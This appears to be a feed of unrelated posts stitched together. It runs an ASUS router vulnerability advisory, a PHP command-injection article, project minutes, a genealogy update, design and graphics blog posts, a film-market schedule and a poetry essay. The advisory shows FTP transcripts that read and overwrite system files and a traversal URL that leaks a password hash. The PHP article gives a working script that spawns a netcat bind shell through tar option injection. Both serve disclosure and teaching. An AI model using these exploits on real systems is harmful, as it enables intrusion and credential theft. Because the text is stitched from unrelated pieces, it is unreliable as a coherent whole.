Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router 

Summary

ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18U
1. Insecure default configuration for the Anonymous FTP user account

Description

The affected ASUS routers suffer from insecure default configuration for Anonymous users, once anonymous access is enabled. Write access is enabled for all directories on the attached storage by default. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.

Impact

The anonymous FTP user can write arbitrary files to the attached storage device.

2. FTP users can access certain system files when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.

Impact

The attacker can read certain system files via FTP.

3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user


User              | Condition A | Condition B | Condition C
Anonymous         |      x      |      x      |      x
FTP User Accounts |      x      |      x      |      x

Impact

The attacker gains access to all system files, including /etc/passwd. This includes exposure of the unsalted MD5 lighttpd password hash, which is automatically created by copying the root user’s credentials for SSH / Administrative Interface access.

Proof of concept

A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx 1 0 0 39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x 2 0 0 860 Jan 06 12:58 bin
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx 1 0 0 34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x 2 0 0 2860 Jan 06 12:58 lib
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx 1 0 0 32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.

4. FTP users can overwrite arbitrary system files

Description

The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.

Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
User              | Condition A | Condition B | Condition C
Anonymous         |      x      |      x      |      x
FTP User Accounts |      x      |      x      |      x

Impact

The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.

Proof of concept

ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************| 214 283.94 KiB/s 00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)

5. Sensitive file disclosure in AiCloud’s AiDisk server

Description

AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server.
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user (see TJA-ASUS-06).

Impact

Attackers can access sensitive files.

Proof of concept

https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword

6. Session management flaw in AiCloud

Description

AiCloud suffers from a session management flaw. If the attacker is on the same external network (or on the same local network), they can spoof their User-Agent to match the admin’s User-Agent and, by doing so, impersonate the Admin user. This is only possible while the Admin has an active session. Note: This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per issue TJA-ASUS-05.

Impact

Attackers can access sensitive files.

7. Sensitive information disclosure in MiniDLNA server

Description

The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.

Impact

Attackers can access sensitive information remotely, without authentication.

Proof of concept

http://[IP/HOST]:8200

MiniDLNA status

Media library

Audio files 347
Video files 0
Image files 6

Connected clients

ID Type IP Address HW Address Connections
0 Samsung Series [CDEF] 192.168.1.99 48:5A:3F:6D:02:A4 0
1 Unknown 192.168.1.55 78:31:C1:CD:11:63 0

0 connections currently open

Solution

Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/

Response timeline

07/01/2016 - Vendor contacted
22/03/2016 - Patch available.
26/03/2016 - Advisory released.

          Security issues with Using PHP's Escapeshellarg        

PHP Escapeshellarg
Written by Eldar Marcussen, Cyber Security Consultant
Using user supplied data on the command line is traditionally a security disaster waiting to happen. In an infinite universe there are, however, times when you might need to do just that. You will be glad to know that PHP provides two functions to aid you with security in those situations: escapeshellcmd and escapeshellarg.

The PHP documentation defines these functions as:


• escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator. Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.

• escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() and the backtick operator.

There are some caveats around the use of these functions which the documentation doesn't cover: command line switches inside single quotes are still treated as command line switches. For example, ls '--help' will print the help text for the ls command. Thus it may be possible to inject data that alters the intended execution, typically referred to as command injection. In order to illustrate this bug I have created a simple proof of concept script which will spawn a bind shell on port 4444 by diverting the execution of tar with command line switches:

<?php
# PoC exploit of php not escaping dash characters in escapeshellarg/cmd
# Reference: http://php.net/manual/en/function.escapeshellarg.php
# Written by Eldar "Wireghoul" Marcussen

# Create a malicious file:

$fh = fopen('myfile.png', 'w');
fwrite($fh, "<?php system('nc -lvp 4444 -e /bin/bash'); echo 'WINRAR!'; ?>");
fclose($fh);

# I choose to use php here, you could use whatever binary you like

$safe_opts = escapeshellarg('--use-compress-program=php');
$safe_file = escapeshellarg('myfile.png'); # Really a php script with a .png extension
system("tar $safe_opts -cf export.tar $safe_file");
?>

The response from the PHP security team is that this is expected behavior, and that it is not possible to protect programs that use parameters in unsafe ways. While I understand their point of view, I still feel that the documentation does not clearly highlight the potential risk around using escapeshellarg. And if you are doing source code reviews, I would take a closer look at any operation which relies on escapeshellarg to sanitise user supplied input.
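
The same caveat is not unique to PHP. As a purely illustrative sketch in Python (the values and commands here are my own, not from the original write-up), quoting an argument does not stop it from being parsed as an option; passing an argv list and terminating option parsing with "--" (supported by GNU ls, tar and most other GNU tools) is the usual mitigation:

import shlex
import subprocess

user_arg = "--help"  # attacker-controlled value

# Quoted for the shell, yet ls still treats it as an option and prints its help text
subprocess.run("ls " + shlex.quote(user_arg), shell=True)

# Safer: no shell involved, and "--" ends option parsing, so the value is treated
# as a (probably non-existent) file name instead of a switch
subprocess.run(["ls", "--", user_arg])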
          Minutes of the Steering Committee Meeting of 25.04.2007        
Dr. Turowski was unable to attend the meeting because of a business trip.

For the first time, Dr. Peter Holleczek and Daniel de West are present as customer representatives, along with Dr. Peter Rygus.

1. Project situation Novell - RRZE

Dr. Hergenröder explained at the outset that the project budget is fixed at 260,000 euros, corresponding to 180 consulting days. 48% of this budget has already been spent, which means that the funds planned for 2006 were used up in the first six months of the project. It is also foreseeable that the consulting budget will become tight over the entire project duration. He therefore raised the question of how the available funds can be used more efficiently than before.

The question was also raised as to what refinancing options exist for the project. The main consideration here is the possibility of lowering the costs for the RRZE by offsetting the project results with other universities in Bavaria (Novell.IDM@Bayern).

According to Mr. Lippert, more attention will have to be paid in future to which tasks Novell staff, as opposed to RRZE staff, can complete more efficiently on account of their experience. In addition, the tasks that may have to be postponed need to be identified.

Mr. Adam is thinking of a cost contribution by other universities in Bavaria (PA, WÜ).

He envisages that a standard configuration based on a common process model will be created within the project. Novell would like to concentrate on the supplying systems here. He recommends identifying the homogeneous systems and implementing exemplary integrations; a uniform process model is the essential foundation for this.

Mr. Eggers points out that this is exactly the objective of the Novell.IDM@Bayern concept. However, he sees the focus more on the target systems than on the source systems, since the similarities lie rather with the latter.

He also reports on the working meeting of 27.03.2007 in Nuremberg, at which it became clear that the colleagues there demand a proof of concept of the Erlangen solution. This is an essential prerequisite for later adoption by other universities.

The exemplary implementation in Erlangen sought by Novell, and its subsequent generalization, raises the question of how the entrepreneurial risk is distributed. If Novell only decides afterwards which costs will not be invoiced or will be offset, that risk lies entirely with the RRZE, which is not acceptable from the point of view of the RRZE representatives.

In addition, generalizing the project results involves a certain amount of effort. Mr. Eggers in particular has so far invested 9.75 person-days in coordinating the Novell.IDM@Bayern project, i.e. this time was financed by the RRZE.

The other universities' skepticism towards the Erlangen solution is based on negative experiences other universities have had with Novell IDM and on the lack of success stories for the concept of "many lean, linked objects". A drop in performance is feared.

Conducting confidence-building load tests using www.slamd.org is discussed. If the load tests are carried out by Novell Consulting, the question arises of who covers the costs of this work, which is not relevant to the project itself.

Mr. Adam therefore asks about the commitment of Wü and PA. Could the load tests be taken over by the other universities? He also makes it clear that in IDM, hardware is a major scaling factor!

Mr. Adam could imagine refinancing through a Germany-wide licensing of the model.

From Mr. Eggers' point of view this is politically not possible within the ZKI on the part of the FAU, since cooperation in the ZKI is based on a free exchange of experience. He therefore proposes settlement via Novell; this is the solution preferred by the FAU. However, it still has to be discussed internally at Novell. Feedback was requested by mid-May.

It is therefore decided to postpone the decision on refinancing until the prototype has been made available and presented to Wü and PA. A final decision on refinancing should be made in August.

As further steps on the part of the RRZE, a presentation of the intended solution, above all to PA and Wü, is agreed. They are to be asked to carry out the load tests. Dr. Hergenröder will try to build up the corresponding trust among his colleagues.

Nevertheless, the question remains what advantage Novell gains from the solution.

For Mr. Adam, an increased sales volume (more universities) and the accompanying economies of scale are essential. Further universities should therefore be identified (HH?). The transferability of the solution is a key factor for an ROI.

Mr. Eggers is asked to develop a rough outline of a product concept.

He will look into making the current state of the Novell.IDM@Bayern concept available.

Mr. Adam asks for a brief explanation of the reusable components, potential further customers, and the preferred billing model (coverage of consulting days).

Digression: Novell provides both a freeRADIUS and an MIT Kerberos with an extension for Universal Password. Dr. Rygus is asked to inform Mr. Tröger about these options.

2. Project status

Mr. Lippert and Mr. Eggers report on the detailed-concept workshop (12-14 March) and explain the project plan that resulted from it. Detailed questions and questions of understanding were discussed.

Mr. Eggers presents the effort estimate for the IDM service portal and can report that it can probably be implemented entirely with the User Application. The use cases comprehensively prepared by Mr. Tröger will form the basis for the development. From 14 to 16 May there will be internal training for the project staff and two new student assistants to introduce them to the finer points of customizing.

Mr. Eggers briefly reports on the positive feedback on the IFB IDMone presentation (rtsp://ard.rrze.uni-erlangen.de/movies/rrze/20070403-Eggers.smil) and points to the article on page 3 of the current BI 77.

He briefly explains the objectives of the IDMone working group, which will meet for the first time on 8 May, and points to first successes with WebSSO.

The project website is also available in English at http://www.rrze.uni-erlangen.de/forschung/laufende-projekte/idm_en.shtml. The translation of "Projekt-Verantwortlicher" as "project guarantor" is called into question, so the steering committee members want to review this individually once more.

3. Risk management - review of the top risks / open items

Mr. Eggers names and briefly explains the following points:

a) Category Blocker:

Staffing (conflict of objectives: replacement vs. scope)

Consensus procedure

Mapping of the organizational structure

b) Category Critical:

Replacement of the existing user administration by 2007

Accessible web interface for the Novell front end

DIT structure

Integration of RRZE billing

4. Outlook until the next meeting / next meeting

Looking ahead, 16.07.2007 can be named as the milestone for a pilot system that is complete according to the current scope planning. More detailed statements about dates are currently not seriously possible.

On 9 May the BRZL AK MetaDir will meet in Erlangen, where IDMone will be presented in detail.

IDMone will be presented to the Senate Commission for Computer Systems (SEKORA) on 11 May.

As mentioned above, training on UserApp customizing for all IDMone staff and two student assistants will take place from 14 to 16 May.

The test system (above all the UserApp) must be in place by May so that the decision workshop planned by the chancellor can take place. *Current addition*: This currently appears doubtful, since a meeting that could possibly have served as the preliminary discussion was moved at short notice to 12 June.

The test system is also the prerequisite for the colleagues from PA and WÜ to be able to see first practical tests and possibly carry out load tests, and for Novell.IDM@Bayern to take more concrete shape.

The project vacation period runs from 17 May to 8 June; during this time there will presumably be no weekly reports either.

The steering committee will meet again on 04.07.2007 from 3 to 5 p.m.

5. Miscellaneous

- Mr. Adam asks that the agenda be sent out one day before the steering committee meeting.


          Document Conservation Resumes for War of 1812 Pension Files        





Message from the President


Today, the Federation of Genealogical Societies (FGS) announced the resumption of conservation of the War of 1812 Pension Files.

The Federation of Genealogical Societies (FGS) is pleased to announce National Archives staff have recently resumed document conservation of the War of 1812 Pension files covering surnames M(Moore)-Q. Document conservation is the essential first step in digitizing these files. Our digitization partner, Ancestry.com, has scheduled image capture of these newly conserved documents to begin the second week of September 2017. As capture resumes, new images will be added to Fold3.com on a rolling basis. The Federation and the dedicated volunteers of the Preserve the Pensions project have worked tirelessly for well over a year to negotiate a resolution to the work stoppage. This portion of the project plan is expected to be completed by third quarter 2018.
Many in our community have expressed frustration with the lack of new information on the status of the Preserve the Pensions project, ongoing negotiations and the safety of donated funds. As incoming President, I had an obligation to hold any response to those concerns until I could evaluate the history, speak candidly with the Preserve the Pensions team and meet with our partners. From the outside, and with perfect hindsight, it is easy to see a few opportunities missed to share more with you, our supporters. I stand behind the Preserve the Pensions team even so. They have worked incredibly hard to bring this unprecedented fundraising and preservation effort this far.

As frustrating as it may be to hear, FGS is limited in how much it can share with the community at large regarding ongoing negotiations with partners. As an organization, we most certainly may not reveal the internal discussions between our partners. That simple fact of business leaves you, our funding supporters, at times without satisfactory answers to your questions. While I will do everything in my power as FGS President to keep you apprised going forward, I will likely never satisfy your questions completely. With that in mind, and with the current project plan in place, I am able to share with you a very brief outline of events.

A security incident at the National Archives and Records Administration (NARA) facility in St. Louis led to a work stoppage of digitization projects for security review. This incident was unrelated to the Preserve the Pensions project in Washington D.C., however, our project was impacted.  The Federal bureaucracy is a slow-moving beast, as many of us have experienced outside of genealogy.   The completed review led to new security and project protocols. These protocols imposed new cost, space, and completion date constraints on the project. Neither conservation nor digitization could resume without a renegotiated project plan. These negotiations were difficult and time-consuming as each partner fought for their organization’s priorities. Ultimately, each partner compromised where they could to bring this important preservation project back online. The negotiations, however, are not over. The project plan above is a test of both the new project protocols and the compromises each of us made. It is a proof of concept. As this new project plan is put into practice, NARA, Ancestry.com, and FGS will continue to work together to evaluate the process with an eye towards negotiating the project plan for the final phase of conservation and digitization of surnames R-Z.

I can assure you, the funds you have so generously contributed to this effort are secure. In accordance with Generally Accepted Accounting Principles (GAAP), funds donated for a specific purpose must be separate from general operating funds. Your donations were deposited into a restricted fund. Any monies FGS provided for matching campaigns were moved from our operating capital into this restricted fund. Digitization and other project expenses were spent from the restricted fund.

While the total value of the project was originally projected to be $3.456 million, FGS was responsible for raising only half that amount - $1.728 million - due to the very generous match by Ancestry.com. This valuation was based on a projected 7.2 million pages in the War of 1812 Pensions collection at a total cost of $0.48 per page image. The new project plan has added to the total cost of the Preserve the Pensions project.  However, the number of images for the first half of the collection was less than originally expected.  We anticipate this trend will continue in the second half of the collection. Therefore, FGS stands by its decision to close community fundraising for the project.

On behalf of the board of the Federation and the dedicated volunteers of the Preserve the Pensions team, I have heard and acknowledge your concerns. Your support of this project has been both overwhelming and inspirational. As a first of its kind effort to crowdfund preservation of a genealogically-valuable collection, there was no roadmap. The Preserve the Pensions team is dedicated to seeing this project through until the very last page of the very last pension is online. We will evaluate the successes and shortcomings of the project as implemented before proceeding to a new project. In the meantime, we will work to regain your trust by being as forthcoming as the realities of these sensitive negotiations will allow.

FGS remains grateful to the community for your contributions; this project would not have been successful without the energy of all of you behind us. I welcome your questions or concerns at president@fgs.org.

--Rorey Cathcart, FGS President

          MANITOBA        

Manitoba has given me so much. It's where I grew up, it's where I met my beautiful wife, and it's where my amazing children were born. This is a proof of concept for an up-and-coming personal project I have been toying with.

The post MANITOBA appeared first on Motion Graphics.


          Practice, production and the quest for innovation        
The means to produce are changing. The chimneys stopped smoking during the course of the past century and are being replaced by an increasingly distributed production line. Production is coming to a desk near you.

These new ways of producing, such as 3D printing, while in some branches of technology already employed in mass production, are being explored extensively by the creative industries. Not so much as a tool of mass production, but rather as a rapid prototyping tool to explore options and demonstrate proof of concept.

Third Thumb, Dani Clode. Image taken from formLabs by Dani Clode. / From Fixing Disability to Extending Ability.

A mesmerizing final-year project was recently developed by design student Dani Clode at the Royal College of Art. She had already worked in reference to the body in earlier projects and also experimented with other ideas centring around prosthetics.

This Third Thumb project explores the relationship between body function, mechanics and perception. Clode says about her project: "It is part tool, part experience, and part self-expression." She has in fact based the project not on the idea of fixing, but rather on the interpretation of the word prosthetic as extending.

The Third Thumb functions via sensors on the wearer's shoes that control the movement of the 3D-printed sixth finger, or third thumb.

COFFEE TABLE, Dani Clode. Image taken from DANI AT RCA by Dani Clode. / MY COFFEE TABLE CURRENTLY, November 21, 2016.

WORK-IN-PROGRESS, Dani Clode. Image taken from DANI AT RCA by Dani Clode. / WORK-IN-PROGRESS, January 20, 2017.

It references a growing body of work exploring the human body, such as, for example, Instrumented Bodies by Joseph Malloch and Ian Hattwick with Les Gestes.

Objects and extensions in this dialogue are not reduced to mere fashion accessories, but are placed in a discourse that ranges from cyborgs to self image. Couldn't be more suitable for our times.

Video taken from Vimeo by Dani Clode. / Promotional clip for an imaginary Kickstarter campaign.
          Data aware jit/blit - drawing 1.25 to 1.45 times faster.        
Drawing different types of pixels can be quicker if you know about the image you are drawing, and if you know that drawing parts of the image with specialised blitters is quicker.

A good example is if your image is 25% areas of large blocks of either white or black. Using a specialised fill routine to just draw those big blocks of color is lots quicker. This is because there is usually an optimised, and hardware accelerated fill routine.

See all this whitespace? (all the white parts on your screen) These can be drawn really quickly with ASIC fill hardware rather than a slow GPU running a general purpose image blitter.

Another example is like this Alien image. The edges of the image are transparent, but the middle has no transparency. Since drawing transparent images is slow, using a different drawing routine for the middle part than the edges turns out to be faster.

Alien graphic used in Pygame Zero teaching framework documentation.
 
Here is a proof of concept which draws an image used by pygame zero in 80% of the time it normally takes. That is about 1.25 times quicker.
https://github.com/illume/dataaware

Alien sectioned up, drawn with 5 different blitters, each perfect for the section.

The results vary dramatically depending on the image itself, but 1.25 times faster is fairly representative of transparent images whose middle part isn't transparent. If it finds sections where the image is a plain colour, that can be 1.42 times faster, or more. Larger images give you different results, as does different hardware. Obviously a platform with fast-path hardware-accelerated image fills, or with fast 16-bit image rendering but slow 32-bit alpha transparency, is going to get much bigger speedups from this technique.

Further work is to develop a range of image classifiers for common situations like this, which return custom blitters depending on the image data, and the hardware which it is running on.
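
A minimal sketch of the idea (my own illustration, not the code from the repository above) is to classify fixed-size tiles of the source image once, then pick a cheaper routine per tile on every draw; the tile size and the three classes below are arbitrary choices, and pygame.surfarray needs NumPy installed:

import pygame

def classify_tiles(surface, tile=32):
    # Yield (rect, kind, color): 'skip' for fully transparent tiles,
    # 'fill' for solid opaque tiles, 'blit' for everything else.
    alpha = pygame.surfarray.array_alpha(surface)   # (width, height) alpha values
    rgb = pygame.surfarray.array3d(surface)         # (width, height, 3) colours
    w, h = surface.get_size()
    for x in range(0, w, tile):
        for y in range(0, h, tile):
            rect = pygame.Rect(x, y, min(tile, w - x), min(tile, h - y))
            a = alpha[x:x + rect.w, y:y + rect.h]
            px = rgb[x:x + rect.w, y:y + rect.h]
            if not a.any():
                yield rect, "skip", None
            elif (a == 255).all() and (px == px[0, 0]).all():
                yield rect, "fill", tuple(int(c) for c in px[0, 0])
            else:
                yield rect, "blit", None

def data_aware_blit(target, source, dest, plan):
    # Draw source onto target at dest using a precomputed tile plan.
    dx, dy = dest
    for rect, kind, color in plan:
        if kind == "skip":
            continue                               # nothing visible in this tile
        elif kind == "fill":
            target.fill(color, rect.move(dx, dy))  # fast (often accelerated) fill path
        else:
            target.blit(source, (dx + rect.x, dy + rect.y), area=rect)

The plan only has to be computed once per image, e.g. plan = list(classify_tiles(alien)), and can then be reused every frame.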

(this is one of several techniques I'm working on for drawing things more quickly on slow computers)

          Day 4 in the Market        


May 20th 2017

 

After an immensely successful first three days of the Marché du Film, day four will surely go off with a bang!

 

Note in your calendar: our newest program, Frontières, will kick off tomorrow morning at 10:00 with proof of concept presentations! And don't forget that you have two days left to experience VR at NEXT.  

 

Running around all day? Stop by the Relaxation Booth (Palais -1, 21-04) to get a massage. Book your appointment now via sms at +33 6 81 69 33 02 or by email at shiatsu06@free.fr.

 

For more information on the events, programs and conferences, take a look at our complete Marché event schedule.

 

 

Last minute screening changes

 

New screenings:

- Palais G - 9:30 - ABSINTHE

- Palais B - 13:30 - TRAGEDY GIRLS

- Palais B - 17:30 - ON WINDS OF EAGLES

- Palais C - 20:30 - TEMPORTALISTS. THE TREASURE OF FATIMA

- Palais E - 20:30 - THE BLACK PRINCE

- Debussy - 16:45 - UNFORGIVEN

- Gray 3 - 10:00 - FREAK SHOW

- Arcades 2 - 16:00 - ISMAEL'S GHOST

- Olympia 5 - 20:30 - BROTHERS IN HEAVEN

- Olympia 6 - 20:00 - BAAHUBALI - THE BEGINNING

- Olympia 7 - 20:00 - EVERYONE'S LIFE

 

Canceled screenings:

- Debussy - 17:00 - LECON DE CINEMA - CLINT EASTWOOD

 

Modifications:

- Debussy - 11:15 - WALKING PAST THE FUTURE changed to: 11:30

- Debussy - 15:30 - APRIL'S DAUGHTERS changed to: 14:15

- Lerins 3 - 16:00 - MONTPARNASSE BIENVENUE - access: market badges changed to: access: priority badges only

- Doc Corner - 9:00 - POMEGRANATES IN LAHORE - length: 12 changed to: length: 110 (trailer in a loop)

- Olympia 1 - 20:15 - BPM - access: market badges changed to: access: market and festival badges (no priority access)

- Olympia 1 - 23:00 - THE SQUARE - access: market badges changed to: access: no priority access

 

 

Events you won't want to miss

 

NEXT:

Conference: - Monetization of VR Content presented by Digital Film Cloud Network, 16:00 - 18:00, NEXT Conference Room (Palais des Festivals, Level -1, Aisle 14)

- 50/50 by 2020 Global Reach presented by Swedish Film Institute, 14:00 - 16:00, Palais K (Level 4, Palais des Festivals)

Market screening: Canada. Big on VR presented by Téléfilm Canada, 10:00 - 11:00, NEXT VR Theater (Palais des Festivals, Level -1, Aisle 14)

 

Doc Corner:

In the Doc Room: - Waynak (Where are you?): How to disrupt the media narrative while creating social impact?, 11:30 - 13:30, Doc Corner Screening Room (Riviera H8)

Doc Talks: - Future Distribution Models hosted by the European Documentary Network, 17:30 - 18:30, Doc Corner Screening Room (Riviera H8)

 

Goes to Cannes:

Presentation: - HAF: Hong Kong Goes to Cannes, 16:00 - 18:00, Palais K (Level 4, Palais des Festivals)

 

Frontières:

Presentation: Proof of Concept, 10:00 - 12:00, Palais K (Level 4, Palais des Festivals)

 
 

          "Much madness is divinest sense" by Emily Dickinson        
Much madness is divinest sense
To a discerning eye,
Much sense, the starkest madness.
'Tis the majority
In this, as all, prevail:
Assent, and you are sane;
Demur, you're straightway dangerous
And handled with a chain.


I was struck first by just how accurate this poem is. History has many instances in which this idea of "majority rules" has defined madness, whether in ruling that the earth is flat or in more serious issues involving race or religion. I particularly like the last two lines, "Demur, you're straightway dangerous/ And handled with a chain." The imagery is particularly vivid and clearly articulates just how much we, the human race, hate to be disagreed with.

Dickinson has managed to do more than simply frame a universal truth; the very way she uses her words is beautiful. Just the first line, "Much madness is divinest sense," slides off the tongue beautifully, helped especially by the repetition of the "s" sound at the end of most of the words. She continues the pattern in the third line, "Much sense, the starkest madness." The similar sounds connect the first and third lines, along with the similar sentence structure. These lines differ from the rest of the poem in other ways, too. The whole poem is written in iambic meter. Most of it has three feet per line, but the first, third (and also seventh) lines have four. This "thesis" of the poem is thus set apart. The seventh line, written with four feet and repeating the "s" sound with "straightway dangerous," connects back to the beginning. It also functions a little like the second line, which, having only three feet and no "s" ending, surprises the reader, breaking the stereotypical flow of poems. The seventh line, set between two tetrameter, rhyming lines, also provides that jerking contrast. The entire poem functions in a similar way: the first three lines work like a stand-alone poem, and the last three do the same, in the same structure and pattern, but the middle lines trip up the tongue, repeating not the "s" sound but the "a" of majority, all, as, and prevail. The result is a poem that feels like it should flow, but that purposely does not.

Why would Dickinson want her poem to feel uncomfortable? Because she is talking about madness and dissent! Her very poem is a proof of concept. The message is "divinest sense," but the structure is strange enough to make some question her writing abilities. She is breaking away from conventional poetry, which either follows a specific structure or is completely free verse. She has a structure; it just isn't one that her readers are used to or comfortable with. This "sense" is as discontenting as "madness" because it goes against regular poetry. And the reader feels it and wants to chain it up in a specific, usual structure. It feels uncomfortable and sometimes difficult to read.

And yet, Dickinson's poem is powerful. Once one has come to understand its structure, saying the first three lines is pleasing, even fun. And there is something powerful in the last, and only, rhyme between "sane" and "chain." It ends the poem with such a solid sound that the prior discomfort is immediately forgotten. "Assent, and you are sane;/ Demur, you're straightway dangerous/ And handled with a chain." Dickinson could make anything sound profound with such talent.
          Getting Started        

